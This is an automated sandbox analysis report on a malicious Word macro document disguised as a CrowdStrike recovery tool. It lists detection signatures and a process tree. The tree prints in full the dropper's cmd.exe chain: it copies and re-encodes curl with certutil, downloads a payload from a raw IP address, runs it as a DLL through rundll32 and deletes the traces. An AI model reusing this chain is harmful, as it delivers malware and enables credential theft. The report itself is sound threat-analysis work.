Edit tour
Windows
Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Overview
General Information
| Sample name: | New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm |
| Analysis ID: | 1478411 |
| MD5: | dd2100dfa067caae416b885637adc4ef |
| SHA1: | 499f8881f4927e7b4a1a0448f62c60741ea6d44b |
| SHA256: | 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 |
| Tags: | docm |
| Infos: |  |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to steal Chrome passwords or cookies
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Classification
- System is w10x64
WINWORD.EXE (PID: 2156 cmdline: "C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /A utomation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) 
cmd.exe (PID: 3916 cmdline: C:\Windows \SysWOW64\ cmd.exe /c xcopy C:\ Windows\Sy stem32\cur l.exe C:\U sers\user\ AppData\Lo cal\Temp & certutil -f -encode C:\Users\ user\AppDa ta\Local\T emp\curl.e xe C:\User s\user\App Data\Local \Temp\curl .txt & cer tutil -f - decode C:\ Users\user \AppData\L ocal\Temp\ curl.txt C :\Users\us er\AppData \Local\Tem p\curl.exe & C:\User s\user\App Data\Local \Temp\curl .exe http: //172.104. 160.126:80 99/payload 2.txt -o C :\Users\us er\AppData \Local\Tem p\mscorsvc .txt & cer tutil -f - decode C:\ Users\user \AppData\L ocal\Temp\ mscorsvc.t xt C:\User s\user\App Data\Local \Temp\msco rsvc.dll & del C:\Us ers\user\A ppData\Loc al\Temp\cu rl.exe & d el C:\User s\user\App Data\Local \Temp\curl .txt & del C:\Users\ user\AppDa ta\Local\T emp\curl.e xe & del C :\Users\us er\AppData \Local\Tem p\mscorsvc .txt & STA RT " " run dll32 C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.dl l,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
xcopy.exe (PID: 5308 cmdline: xcopy C:\W indows\Sys tem32\curl .exe C:\Us ers\user\A ppData\Loc al\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C) 
certutil.exe (PID: 2496 cmdline: certutil - f -encode C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e C:\Users \user\AppD ata\Local\ Temp\curl. txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1) - certutil.exe (PID: 3552 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\curl.tx t C:\Users \user\AppD ata\Local\ Temp\curl. exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1) - curl.exe (PID: 2784 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e http://1 72.104.160 .126:8099/ payload2.t xt -o C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.tx t MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - certutil.exe (PID: 2496 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\mscorsv c.txt C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.dl l MD5: 0DDA4F16AE041578B4E250AE12E06EB1) 
rundll32.exe (PID: 5068 cmdline: rundll32 C :\Users\us er\AppData \Local\Tem p\mscorsvc .dll,DllMa in MD5: 889B99C52A60DD49227C5E485A016679) - rundll32.exe (PID: 3992 cmdline:
rundll32 C :\Users\us er\AppData \Local\Tem p\mscorsvc .dll,DllMa in MD5: EF3179D498793BF4234F708D3BE28633) - cmd.exe (PID: 5640 cmdline:
C:\Windows \system32\ cmd.exe /c taskkill /F /IM chr ome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 2144 cmdline:
taskkill / F /IM chro me.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
chrome.exe (PID: 7612 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 7792 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2084 --fi eld-trial- handle=197 6,i,141894 6015826721 9968,94386 0541875996 3760,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- chrome.exe (PID: 2716 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://go.mi crosoft.co m/fwlink/? linkid=228 0386" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- WINWORD.EXE (PID: 3856 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /A utomation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678) - cmd.exe (PID: 6464 cmdline:
C:\Windows \SysWOW64\ cmd.exe /c xcopy C:\ Windows\Sy stem32\cur l.exe C:\U sers\user\ AppData\Lo cal\Temp & certutil -f -encode C:\Users\ user\AppDa ta\Local\T emp\curl.e xe C:\User s\user\App Data\Local \Temp\curl .txt & cer tutil -f - decode C:\ Users\user \AppData\L ocal\Temp\ curl.txt C :\Users\us er\AppData \Local\Tem p\curl.exe & C:\User s\user\App Data\Local \Temp\curl .exe http: //172.104. 160.126:80 99/payload 2.txt -o C :\Users\us er\AppData \Local\Tem p\mscorsvc .txt & cer tutil -f - decode C:\ Users\user \AppData\L ocal\Temp\ mscorsvc.t xt C:\User s\user\App Data\Local \Temp\msco rsvc.dll & del C:\Us ers\user\A ppData\Loc al\Temp\cu rl.exe & d el C:\User s\user\App Data\Local \Temp\curl .txt & del C:\Users\ user\AppDa ta\Local\T emp\curl.e xe & del C :\Users\us er\AppData \Local\Tem p\mscorsvc .txt & STA RT " " run dll32 C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.dl l,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - xcopy.exe (PID: 7500 cmdline:
xcopy C:\W indows\Sys tem32\curl .exe C:\Us ers\user\A ppData\Loc al\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C) - certutil.exe (PID: 7576 cmdline:
certutil - f -encode C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e C:\Users \user\AppD ata\Local\ Temp\curl. txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1) - certutil.exe (PID: 4820 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\curl.tx t C:\Users \user\AppD ata\Local\ Temp\curl. exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1) - curl.exe (PID: 8092 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e http://1 72.104.160 .126:8099/ payload2.t xt -o C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.tx t MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - certutil.exe (PID: 8116 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\mscorsv c.txt C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.dl l MD5: 0DDA4F16AE041578B4E250AE12E06EB1) - rundll32.exe (PID: 5208 cmdline:
rundll32 C :\Users\us er\AppData \Local\Tem p\mscorsvc .dll,DllMa in MD5: 889B99C52A60DD49227C5E485A016679) - rundll32.exe (PID: 5940 cmdline:
rundll32 C :\Users\us er\AppData \Local\Tem p\mscorsvc .dll,DllMa in MD5: EF3179D498793BF4234F708D3BE28633) - cmd.exe (PID: 2540 cmdline:
C:\Windows \system32\ cmd.exe /c taskkill /F /IM chr ome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5680 cmdline:
taskkill / F /IM chro me.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: | ||